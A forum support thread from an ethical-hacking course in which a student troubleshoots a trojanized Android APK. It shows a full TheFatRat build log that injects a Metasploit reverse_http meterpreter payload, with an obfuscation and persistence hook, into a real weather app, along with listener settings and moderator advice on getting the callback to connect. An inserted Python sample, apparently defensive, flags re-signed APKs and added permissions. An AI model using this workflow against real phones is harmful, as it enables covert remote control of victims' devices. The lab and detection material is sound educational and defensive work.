  • #72800
    buystuff1234
    Participant

    Hello,
    I get this error message in FatRat when trying to create the APK. I followed the instructions from the course. But maybe the issue has to do with the fact that when I run 'update-alternatives --config java' I get Java version 17 and Java 11 as options. I tried them both, but received the same error. So I am not able to choose version 8 as the course says.
    Thank you in advance

    #72803
    Diego Pérez
    Moderator

    Hi!
    The image wasn’t uploaded, can you try it again?

    Greetings!
    Diego

    #72814
    buystuff1234
    Participant

    Hey Diego,

    Here is the screenshot, but I also tried a different application instead of the Flappy Bird one from the course. When I used Angry Birds it completed the APK successfully. And I followed all the following steps: moving it to my /var/www/html/evil-files/ and setting up a new listener on Metasploit, using exploit/multi/handler/, setting payload /android/meterpreter/reverse_http (tried tcp as well), setting lhost to my IP address and setting lport 8080 (tried 4444 also).
    Then exploit to listen for new incoming agents.
    Running apache2 and using an Android phone to download the application. All of this goes without issues: I download and install the application from the Apache server, but I don't get the meterpreter session. What am I missing?

    #72825
    Diego Pérez
    Moderator

    Hi!
    Unfortunately the images are not uploading; maybe upload them to Google Drive and share the link here.
    Also, for this attack to work you need a wireless adapter, do you have one?
    Make sure that you're using the same payload when generating the backdoor and when using multi handler. If you're already doing that, then try using a different port. If you're still having issues, then please show me the following:
    1. Result of ifconfig and route -n in Kali.
    2. The IP of the phone.
    3. The options used for generating the backdoor in fatrat.
    4. The result of show options before running the multi handler.

    Let me know.
    Diego

    #73124
    buystuff1234
    Participant

    Hello Diego,

    Why do I need to use a wireless adapter? The course says nothing about a wireless adapter.
    Here the course tells you to create a malicious APK file and then place it in your evil-files on your Apache server,
    and download it with an Android device that is connected to the same network. I have a wireless adapter if needed.
    I'm failing to get the meterpreter session.

    #73130
    Diego Pérez
    Moderator

    Hi!
    Well, you need a wireless adapter because a mobile phone can't connect to the virtual network created by VMware, hence we need to connect Kali to the real network, and that's the use of the wireless adapter. So, connect the adapter to the network and create a malicious APK using the IP of the wireless adapter interface (usually wlan0) as LHOST.

    Greetings!
    Diego

    #73225
    buystuff1234
    Participant

    Hello Diego,

    I did what you said and used the wlan0 IP address to create the APK, but still didn't get a meterpreter session. I also tried lport 4444, but without result.
    Any ideas what I could do differently?
    Thanks

    #73229
    Diego Pérez
    Moderator

    Hi!
    Make sure that you're using the same payload when generating the backdoor and when using multi handler. If you're already doing that, then try using a different port. If you're still having issues, then please show me the following:
    1. Result of ifconfig and route -n in Kali.
    2. IP of the device.
    3. The result of options before generating the malicious APK.
    4. The result of show options before running the multi handler.

    Let me know.
    Diego

    #73239
    buystuff1234
    Participant

    eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
    inet 192.168.100.238 netmask 255.255.255.0 broadcast 192.168.100.255
    inet6 fe80::20c:29ff:fe7e:b94e prefixlen 64 scopeid 0x20<link>
    ether 00:0c:29:7e:b9:4e txqueuelen 1000 (Ethernet)
    RX packets 4825 bytes 2941520 (2.8 MiB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 5780 bytes 891394 (870.5 KiB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
    inet 127.0.0.1 netmask 255.0.0.0
    inet6 ::1 prefixlen 128 scopeid 0x10<host>
    loop txqueuelen 1000 (Local Loopback)
    RX packets 1004 bytes 106816 (104.3 KiB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 1004 bytes 106816 (104.3 KiB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
    inet 10.8.0.2 netmask 255.255.0.0 destination 10.8.0.2
    inet6 fdda:d0d0:cafe:1194::1000 prefixlen 64 scopeid 0x0<global>
    inet6 fe80::44b1:5bb1:12d2:e76e prefixlen 64 scopeid 0x20<link>
    unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
    RX packets 3229 bytes 1507100 (1.4 MiB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 4378 bytes 445050 (434.6 KiB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 2312
    inet 192.168.100.106 netmask 255.255.255.0 broadcast 192.168.100.255
    inet6 fe80::7bae:4f96:fdb:22b9 prefixlen 64 scopeid 0x20<link>
    ether 00:13:ef:f4:00:60 txqueuelen 1000 (Ethernet)
    RX packets 292 bytes 173648 (169.5 KiB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 18 bytes 2738 (2.6 KiB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    root@kali:~# route -n
    Kernel IP routing table
    Destination      Gateway        Genmask          Flags  Metric  Ref  Use  Iface
    0.0.0.0          10.8.0.1       128.0.0.0        UG     0       0    0    tun0
    0.0.0.0          192.168.100.1  0.0.0.0          UG     100     0    0    eth0
    0.0.0.0          192.168.100.1  0.0.0.0          UG     600     0    0    wlan0
    10.8.0.0         0.0.0.0        255.255.0.0      U      0       0    0    tun0
    128.0.0.0        10.8.0.1       128.0.0.0        UG     0       0    0    tun0
    185.213.154.134  192.168.100.1  255.255.255.255  UGH    0       0    0    eth0
    192.168.100.0    0.0.0.0        255.255.255.0    U      100     0    0    eth0
    192.168.100.0    0.0.0.0        255.255.255.0    U      600     0    0    wlan0
    root@kali:~#

    IP device: 192.168.100.129

    [ ] Embed a Metasploit Payload in an original .apk files [ ]
    [ ] This script is POC for injecting metasploit payload arbitary apk backdoor [ ]
    [ ]===========================================================================[ ]

    Cleaning Temp files
    Done!

    Your local IPV4 address is : 192.168.100.106
    Your local IPV6 address is : fe80::7bae:4f96:fdb:22b9
    Your public IP address is :
    Your Hostname is :

    Set LHOST IP: 192.168.100.106

    Set LPORT: 8080

    Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)

    Path : /root/Downloads/buienradar.apk

    Testing your apk before next step …
    +-------------------------------------------+
    | [ 1 ] android/meterpreter/reverse_http    |
    | [ 2 ] android/meterpreter/reverse_https   |
    | [ 3 ] android/meterpreter/reverse_tcp     |
    | [ 4 ] android/shell/reverse_http          |
    | [ 5 ] android/shell/reverse_https         |
    | [ 6 ] android/shell/reverse_tcp           |
    +-------------------------------------------+

    Choose Payload : 1

    [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
    +-------------------------------------+
    | [ 1 ] Use Backdoor-apk 0.2.4a       |
    | [ 2 ] Use old Fatrat method         |
    | [ 3 ] Use MsfVenom Embedded method  |
    +-------------------------------------+

    Select Tool to create apk : 1

    [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]$
    Generate Backdoor
    +------------++-------------------------++-----------------------+
    | Name       || Descript                || Your Input
    +------------++-------------------------++-----------------------+
    | LHOST      || The Listen Addres       || 192.168.100.106
    | LPORT      || The Listen Ports        || 8080
    | OUTPUTNAME || The Filename output     || app_backdoor.apk
    | PAYLOAD    || Payload To Be Used      || android/meterpreter/reverse_http
    +------------++-------------------------++-----------------------+

    [ASCII-art banner: APK, Dana James Traversie]

    [*] Running backdoor-apk.sh v0.2.4a on Thu Jul 6 07:29:27 AM EDT 2023
    [+] Android manifest permission options:
    1) Keep original
    2) Merge with payload and shuffle
    [?] Please select an Android manifest permission option: 2
    [*] Decompiling original APK file…done.
    [*] Locating smali file to hook in original project…done.
    [+] Package where RAT smali files will be injected: com/supportware/Buienradar
    [+] Smali file to hook RAT payload: nl/rtl/buienradar/BuienradarApplication.smali
    [*] Generating RAT APK file…done.
    [*] Decompiling RAT APK file…done.
    [*] Merging permissions of original and payload projects…done.
    [*] Injecting helpful Java classes in RAT APK file…done.
    [*] Creating new directory in original package for RAT smali files…done.
    [+] Inject package path: com/supportware/Buienradar/anvzv
    [+] Generated new smali class name for MainBroadcastReceiver.smali: Xoodj
    [+] Generated new smali class name for MainService.smali: Omede
    [+] Generated new smali class name for Payload.smali: Xiqlw
    [+] Generated new smali class name for StringObfuscator.smali: Mvtrc
    [+] Generated new smali method name for StringObfuscator.obfuscate method: ludhu
    [+] Generated new smali method name for StringObfuscator.unobfuscate method: wgycs
    [*] Copying RAT smali files to new directories in original project…done.
    [*] Fixing RAT smali files…done.
    [*] Obfuscating const-string values in RAT smali files…Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    done.
    [*] Adding hook in original smali file…done.
    [*] Adding persistence hook in original project…done.
    [*] Recompiling original project with backdoor…done.
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

    Warning:
    The certificate uses the SHA1withRSA signature algorithm which is considered a security risk. This algorithm will be disabled in a future update.
    The certificate uses a 1024-bit RSA key which is considered a security risk. This key size will be disabled in a future update.
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

    Warning:
    The certificate uses the SHA1withRSA signature algorithm which is considered a security risk. This algorithm will be disabled in a future update.
    The certificate uses a 1024-bit RSA key which is considered a security risk. This key size will be disabled in a future update.
    [*] Generating RSA key for signing…done.
    [*] Signing recompiled APK…done.
    [*] Verifying signed artifacts…done.
    [*] Aligning recompiled APK…done.

    [*] Backdoor apk created succefully
    Your RAT apk was successfully builded and signed , it is located here :
    ~/Fatrat_Generated/app_backdoor.apk

    Do you want to create a listener for this configuration
    to use in msfconsole in future ?

    Choose y/n :

    msf6 exploit(multi/handler) > show options

    Module options (exploit/multi/handler):

    Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------

    Payload options (android/meterpreter/reverse_http):

    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LHOST  192.168.100.106  yes       The local listener hostname
    LPORT  8080             yes       The local listener port
    LURI                    no        The HTTP Path

    Exploit target:

    Id  Name
    --  ----
    0   Wildcard Target

    msf6 exploit(multi/handler) >
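
Seen from the defending side, the build log in the post above leaves two checkable traces: the manifest permissions are merged with the payload's, and the APK is re-signed with a freshly generated key (the log warns about a 1024-bit RSA key). The following is an added example, not part of the thread or of any tool mentioned in it, that compares a sideloaded APK against the publisher's build of the same package. The `aapt dump permissions`-style text, the package name, the digests and the `SENSITIVE` list are constructed assumptions.

```python
import re

# Illustrative, not exhaustive: permissions worth a closer look when newly added.
SENSITIVE = {"READ_SMS", "SEND_SMS", "RECORD_AUDIO", "CAMERA", "READ_CONTACTS",
             "ACCESS_FINE_LOCATION", "RECEIVE_BOOT_COMPLETED"}
PERM_RE = re.compile(r"^uses-permission(?:-sdk-\d+)?:\s*name='([^']+)'", re.M)

def permissions(aapt_text):
    """Extract permission names from `aapt dump permissions`-style text."""
    return set(PERM_RE.findall(aapt_text))

def normalise_digest(digest):
    """Lower-case a hex digest and drop separators such as ':' or spaces."""
    return re.sub(r"[^0-9a-f]", "", digest.lower())

def triage(reference, candidate):
    """List how `candidate` deviates from the known-good `reference` build."""
    findings = []
    if normalise_digest(reference["cert_sha256"]) != normalise_digest(candidate["cert_sha256"]):
        findings.append("signing certificate differs from the publisher's")
    added = permissions(candidate["aapt"]) - permissions(reference["aapt"])
    for perm in sorted(added):
        tag = "sensitive" if perm.rsplit(".", 1)[-1] in SENSITIVE else "new"
        findings.append(f"{tag} permission added: {perm}")
    if candidate.get("key_bits", 2048) < 2048:
        findings.append(f"weak signing key: {candidate['key_bits']}-bit RSA")
    return findings

# Constructed sample data (hypothetical package, digests and permissions).
BASE_PERMS = ("package: nl.example.weather\n"
              "uses-permission: name='android.permission.INTERNET'\n"
              "uses-permission: name='android.permission.ACCESS_COARSE_LOCATION'\n")
REFERENCE = {"cert_sha256": "aa" * 32, "key_bits": 2048, "aapt": BASE_PERMS}
CANDIDATE = {"cert_sha256": "bb" * 32, "key_bits": 1024,
             "aapt": BASE_PERMS
                     + "uses-permission: name='android.permission.READ_SMS'\n"
                     + "uses-permission: name='android.permission.RECORD_AUDIO'\n"
                     + "uses-permission: name='android.permission.WAKE_LOCK'\n"}

if __name__ == "__main__":
    for finding in triage(REFERENCE, CANDIDATE):
        print(finding)
```

A certificate mismatch alone is already decisive for a package that claims to be a known publisher's app, since Android refuses to install an update signed with a different key over the original.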

    #73245
    Diego Pérez
    Moderator

    Hi!
    Cool, are you able to reach Kali's web server from your phone?
    You can also try to use a different payload; try with the tcp one. Or even use a different APK.

    Greetings!
    Diego

    #74512
    Hossam H.I.M
    Participant

    Hi Diego, I am wondering why Kali Windows 64-bit became Apple M1 after installation. Everything was going well until I realized that Kali had Apple written on it in the program; then when I tried it, it wouldn't work, saying that the version is not correct. I deleted it and did it again, with the same result. I deleted it again with 7-Zip, and VMware also, same problem; plus, when I reinstalled 7-Zip and extracted it, it did not extract like the first time and extracted other files. I troubleshot the PC and recovered Windows defaults.

    #74530
    Diego Pérez
    Moderator

    Hi!
    It seems you are downloading the wrong version. If you are using Windows, make sure to follow the instructions as in the Windows installation lecture and use the exact same link that Zaid points out.

    Greetings!
    Diego
